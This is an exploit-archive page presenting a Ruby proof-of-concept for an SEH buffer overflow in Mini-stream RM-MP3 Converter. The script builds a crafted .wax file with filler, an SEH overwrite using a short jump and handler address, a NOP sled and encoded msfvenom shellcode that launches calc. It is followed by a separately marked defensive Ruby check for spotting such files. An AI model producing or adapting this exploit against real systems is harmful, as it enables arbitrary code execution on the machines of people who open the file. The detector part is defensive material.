Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
Source: mind1355[at]gmail.com  Author: Ramli  Published: 2014-11-27
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]
  
filename = "3-1-2-1-gb.wax"
  
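seh  = 43501            # offset of the SEH handler pointer within the buffer
buff = "\x41" * 45000   # filler ("A") for the oversized .wax file
nops = "\x90" * 16      # NOP sled placed ahead of the payload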
  
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"
  
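# Layout around the SEH record: next-SEH field, handler pointer, NOP sled, payload
buff[seh-4,4] = "\xeb\x0e\x90\x90"  # next-SEH field: short jump (+0x0e) over the handler pointer
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")  # handler pointer, little-endian
buff[seh+4,nops.size] = nops
buff[seh+(4+nops.size),sc.size] = sc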
  
# The block form of File.open closes the file on exit
File.open(filename,"wb") do |fp|
  fp.write(buff)
  puts "Exploit file created: #{filename} size: #{buff.size}"
end
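
A defender-side triage check for files shaped like the one this script writes, as an added example that is not part of the original exploit or any vendor code: a legitimate .wax playlist is short ASX-style XML text, while this file is 45000 bytes of filler with raw binary bytes near offset 43501. The function name `wax_findings`, both thresholds and the sample inputs are assumptions constructed for illustration.

```ruby
# Heuristic triage for .wax playlist files (added example, not from the original page).
MAX_SIZE = 16_384  # assumption: real playlists are small text files
MAX_RUN  = 256     # assumption: longest run of one repeated byte tolerated

# Returns a list of findings for the raw bytes of a .wax file; empty means nothing flagged.
def wax_findings(data)
  bytes = data.b  # binary copy, so offsets are bytes and no encoding errors occur
  findings = []

  if bytes.bytesize > MAX_SIZE
    findings << "size #{bytes.bytesize} exceeds #{MAX_SIZE}"
  end

  # A playlist is expected to open with an <asx ...> root element.
  unless bytes.match?(/\A\s*<asx[\s>]/i)
    findings << "no <asx> root element at start of file"
  end

  # Overflow filler shows up as one byte value repeated thousands of times.
  run = bytes.bytes.chunk_while { |a, b| a == b }.map(&:size).max.to_i
  if run > MAX_RUN
    findings << "longest single-byte run #{run} exceeds #{MAX_RUN}"
  end

  # Control bytes other than tab, CR and LF do not belong in XML text.
  ctrl = bytes.count("\x00-\x08\x0b\x0c\x0e-\x1f\x7f")
  findings << "#{ctrl} control byte(s) in text file" if ctrl > 0

  findings
end

# Constructed samples: a minimal playlist, and an inert file with the same
# shape as the PoC output (filler plus four placeholder binary bytes).
BENIGN = %(<asx version="3.0">\n  <entry><ref href="http://media.example/a.wma"/></entry>\n</asx>\n)
OVERSIZED = ("A" * 45_000).b.tap { |s| s[43_497, 4] = "\x01\x02\x03\x04".b }

if __FILE__ == $PROGRAM_NAME
  ARGV.each { |path| puts "#{path}: #{wax_findings(File.binread(path)).inspect}" }
end
```

Run it with one or more file paths as arguments to list the findings per file.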

 